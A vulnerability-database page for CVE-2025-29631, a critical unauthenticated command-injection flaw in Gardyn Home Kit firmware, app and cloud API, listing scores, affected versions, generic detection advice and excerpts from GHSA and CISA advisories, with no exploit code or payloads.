CVE-2025-29631
published 2025-07-25CVE-2025-29631: Gardyn Home Kit firmware before master.619, Home Kit Mobile Application before 2.11.0, and Home Kit Cloud API before 2.12.2026 allow command injection through…
PriorityP273critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
1.81%
75.9th percentile
Gardyn Home Kit firmware before master.619, Home Kit Mobile Application before 2.11.0, and Home Kit Cloud API before 2.12.2026 allow command injection through vulnerable methods that do not sanitize input before passing content to the operating system for execution. The vulnerability may allow an attacker to execute arbitrary operating system commands on a target Home Kit.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gardyn | home_kit_firmware | < master.619 | master.619 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect OS command injection attempts targeting Gardyn Home Kit — monitor for unsanitized input being passed to OS execution methods via the Cloud API or firmware interfaces ↗
- →Alert on unauthenticated network requests (no credentials required, CVSS PR:N) to Gardyn Home Kit Cloud API endpoints that may carry shell metacharacters or command injection payloads ↗
- →Flag Gardyn Home Kit devices running firmware versions earlier than master.619 as unpatched and at risk of command injection exploitation ↗
- →Monitor for arbitrary OS command execution on Gardyn Home Kit edge devices, which may indicate successful exploitation of CVE-2025-29631 ↗
- →Correlate CVE-2025-29631 exploitation attempts with CVE-2025-29629 (weak default SSH credentials) and CVE-2025-1242 (hard-coded credentials) — chained exploitation could allow full device takeover and lateral movement to other edge devices in the Gardyn cloud environment ↗
- ·CVE-2025-29631 affects three distinct attack surfaces: the firmware (before master.619), the mobile application (before 2.11.0), and the Cloud API (before 2.12.2026) — detection coverage must account for all three vectors ↗
- ·As of the advisory date, Gardyn had not yet released a full mitigation for CVE-2025-29631 — firmware upgrade to master.619 is recommended but may not fully remediate the vulnerability ↗
- ·The vulnerability is unauthenticated (CVSS PR:N), meaning no prior credential compromise is required for exploitation — network-level access controls are the primary compensating control until a full patch is available ↗
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4993-4c8h-h8w5: An issue in Gardyn 4 allows a remote attacker execute arbitrary code
ghsa_unreviewed·2025-07-25
CVE-2025-29631 [CRITICAL] CWE-78 GHSA-4993-4c8h-h8w5: An issue in Gardyn 4 allows a remote attacker execute arbitrary code
An issue in Gardyn 4 allows a remote attacker execute arbitrary code
CISA ICS
Gardyn Home Kit
cisa_ics·2026-02-24·CVSS 9.1
[CRITICAL] Gardyn Home Kit
ICS Advisory
##
Gardyn Home Kit
Release DateFebruary 24, 2026
Alert CodeICSA-26-055-03
Related topics:
Industrial Control System Vulnerabilities, Industrial Control Systems
View CSAF
## Summary
Successful exploitation of these vulnerabilities could allow unauthenticated users to access and control edge devices, access cloud-based devices and user information without authentication, and pivot to other edge devices managed in the Gardyn cloud environment.
The following versions of Gardyn Home Kit are affected:
- Home Kit Firmware
- Gardyn Home Kit Mobile Application <2.11.0 (CVE-2025-29628, CVE-2025-29629, CVE-2025-29631, CVE-2025-1242)
- Gardyn Home Kit Cloud API <2.12.2026 (CVE-2025-29628, CVE-2025-29629, CVE-2025-29631, CVE-2025-1242)
CVSS
Vendor
Equipm
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2025-07-25
Published